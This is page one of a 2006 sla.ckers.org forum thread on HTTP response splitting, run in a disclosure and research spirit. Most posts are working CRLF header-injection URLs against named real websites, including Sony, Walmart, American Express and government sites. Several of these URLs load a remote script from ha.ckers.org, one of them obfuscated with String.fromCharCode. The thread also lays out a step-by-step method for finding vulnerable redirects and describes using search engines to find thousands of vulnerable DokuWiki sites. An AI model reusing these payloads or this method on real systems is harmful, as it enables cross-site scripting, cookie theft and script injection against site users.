Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 12:44PM

Feeding directly from the redirects thread, as I find them I'll post them here, because it doesn't really make sense in the redirects thread even though that's the idea behind why you'd do this in the first place:

http://www.dataplace.org/redir.html?url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

As a side note it seems like there'd be a way to use this to steal HTTP Only cookies as well as long as the Set-Cookie directive were below the Location header.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 12:53PM

Also pulled from Maluc's redirect list: http://www.topix.net/redir/loc=prss-myway/%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 12:56PM

Last one from Maluc's list: http://www.mass.gov/portal/url-trx.jsp?MGTitle=&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: Kyran
Date: September 25, 2006 03:50PM

That last one opens as a download in Opera. Interesting.

- Kyran

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: kirke
Date: September 25, 2006 04:43PM

opera is more strict RFC. Com'on, are we @ckers?
use %0d%0a instead of %0a or %0a%0a, and test again.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: September 25, 2006 04:49PM

Yup... it was just a proof of concept... hardly polished.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: September 26, 2006 11:07PM

http://www.sony.com/SonySearch/ClickThrough?target=%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&term=blah&topicname=%2FHome&origin=www.sony.com&pagenum=1

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: September 26, 2006 11:14PM

From Maluc's list: http://www.brasilecodiesel.com.br/links/index.php?redir=le&acai3_cod=314228&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: September 29, 2006 04:51PM

Edit: Removed. not actual response splitting, just XSS.

-maluc



Edited 1 time(s). Last edit at 10/14/2006 11:43AM by maluc.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: October 02, 2006 10:25PM

if you didn't test them, where were they from? or a google dork?

Edit: nevermind, the link names answered that question .. and alot don't work, although the berkeley one did ^^

-maluc



Edited 1 time(s). Last edit at 10/02/2006 10:27PM by maluc.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: unsticky
Date: October 02, 2006 10:34PM

I'm workin' on it, I'm going through them now. And in a way, yes, a google dork. but... but... I found an exploit, and then googled for sites running the software... That makes me atleast a step above a normal google dork.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: October 02, 2006 11:19PM

indeed it does, so guud job for that.. ^^

i'm assuming by the link names that dokuwiki is the culprit?

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: October 02, 2006 11:43PM

Open source website applications strike again! Knowing what software will be vulnerable is key to finding issues. This is exactly how a full scale XSS worm could work in theory. Nice find unsticky. Even if only half of them work, that's still a huge success ratio for a single search. Imagine if it were in PHP nuke... thousands of sites would be vulnerable... maybe tens of thousands.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: unsticky
Date: October 02, 2006 11:49PM

Yup, DokuWiki is indeed the culprit, and I already emailed the creator(s) of the software. According to google, ~13,800 sites run DokuWiki, and if the trend of 54/101 results are actually vulnerable continues, then that leaves something in the ballpark of 7300.



Edited 1 time(s). Last edit at 10/03/2006 01:43AM by unsticky.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: October 03, 2006 12:33AM

well there's no telling how many of those are duplicate domains..

but in any case, it's alot of vulnerable sites.

-maluc



Edited 1 time(s). Last edit at 10/03/2006 01:29AM by maluc.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: October 14, 2006 02:53AM

http://yellowpages.com/sp/exittracking/?path=http://%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E

doesn't work in IE though..

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: October 14, 2006 03:14AM

http://www.switchboard.com/bin/cgiredir.dll?ID=515&URL=http://%0d%0a%0d%0a%3Cbody%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,32,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,97,46,99,107,101,114,115,46,111,114,103,47,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41));alert(%22location.host%20is:%20%22%2Blocation.host);%3C%2Fscript%3E

Also does not work in IE/opera .. is it because only firefox outputs response errors?

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: yawnmoth
Date: October 14, 2006 10:50AM

I've never gotten HTTP Response Splitting to work in IE. I think it's because, in Firefox, the last HTTP response code takes precidence, whereas in IE, it's the first.



Edited 2 time(s). Last edit at 10/14/2006 01:55PM by yawnmoth.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: October 14, 2006 11:41AM

ya, none of these work in IE .. except for the randolph.af.mil one.. which i'll be relocating because it's not actually responce splitting

just meta injection _-_

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: nrg
Date: October 20, 2006 10:02AM

got one http://www.regnow.com/softsell/visitor.cgi?affiliate=14776&action=site&vendor=8527&ref=http://%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
other http://oceanservice.noaa.gov/cgi-bin/redir.cgi?url=%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
even other http://www.puretna.com/redir.php?url=%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

these are easily found through google dork (following maluc's method and making some adjustments in it)

also ty rsnake for those 3 vectors for HTTP Response splitting.

challenge: can someone find the right vector for this page (just curious cause this as a weird system)? http://www.fxpsc.co.jp/cgi-bin/redir.cgi?url=



Edited 3 time(s). Last edit at 10/20/2006 06:53PM by nrg.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: November 18, 2006 04:52PM

from broken's redirect: http://www.walmart.com/third_party_redirector.gsp?vendor=GE&service=CREDITAPP&url=http://%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: br0ken
Date: November 18, 2006 05:10PM

*scratches head*
I think I got some reading to do ...
I think I will start with this ha.ckers.org

btw thanks maluc for this and neoseeker.com xss.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: November 18, 2006 05:27PM

Yeah, i don't understand much about detecting response splitting myself.. i just try all the methods used in this thread so far, and see if they work.

what i'd really like to know, that someone like rsnake/unsticky might be able to explain.. is there certain clues in the responses seen by Live HTTPHeaders or burp proxy as to which method will work?

for example, a response that cuts off after the first colon:
HTTP/1.x 302 Moved Temporarily
Date: Sat, 18 Nov 2006 23:14:41 GMT
Server: Apache-Coyote/1.1
Location: content-type:
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
(injection: %0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
)

does that give any clues? or do you guys follow a similar spray-n-pray approach

basically just, what's your typical flowchart look like

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: br0ken
Date: November 18, 2006 06:30PM

I am just looking thru Amit Klein's whitepaper_httpresponse.pdf.
and not really seeing no sure fire way to spot them ??
Could be that I am sleepy tho ?

Anywho found one at aol.com

Aol.com

Redirect was found by benn_0_

./br0ken

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: November 18, 2006 06:58PM

I guess here's my methodology. It's a pain but it works.

For redirection response splitting:
1) locate a redirect on the site in question. Most big sites have them so this isn't that uncommon. I use my own custom script for locating them but I actually find them just as often by manual inspection.
2) See what kind of redirect it is by slowing it down with burp proxy with all server responses turned on (turn off the text bullet).
3) If it's a META it's not vulnerable (may be to XSS but not to response splitting). Same with JavaScript redirection. If it's 301, 302 or 304, chances are it's vulnerable.
4) Next replace the "http://www.whatever...." with "%0A%0Dhttp://www.whatever...." and hit the redirection again. If you see that it's changed the output from the %0A%0D to an actual newline/carriage return there is a very high probability that it's vulnerable.
5) Lastly try a full header injection with something like %0AContent-Type:html%0A%0A<script>alert("XSS")</script>

There may be some reasons some of the characters aren't allowed so your mileage may vary, but that's the general route I take for redirection. Cookies or other headers have their own methods. Ultimately it's just a pain, but you can short circuit the whole process by just jumping from line 2 to 5 and watching the output to see what happens.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: November 21, 2006 01:19AM

thanks, i never gave burp proxy a try for it.. but it's way better than trying to use Live HTTP Headers.. the latter only shows properly formatted headers rather than the raw data stream.

so for those looking to audit response splitting.. definitely use burp proxy. Live HTTP Headers is mostly useless for it :/

from rsnake's redirect list: http://wow.com/redir?src=PTL&clickedItemURN=http://%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

by the way rsnake, there's a typo in the third example of http://ha.ckers.org/response-splitting.html
the > in "body onload=%3Ealert(" is unnecessary

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: November 21, 2006 11:54AM

Whoops! Thanks, maluc, I fixed that. As you can tell I wrote the examples out by hand. That'll teach me.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: November 27, 2006 08:29PM

heh, no prob..

from malorn's redirect disclosure:

http://www109.americanexpress.com/rightp/ads_redirect.jsp?location=http://%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: November 29, 2006 06:37AM

Dear CERT Webmasters,

Please try to build security in US-CERT.

Love Always,
-maluc

P.S. definitely the most ironic link name for an XSS i've seen

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.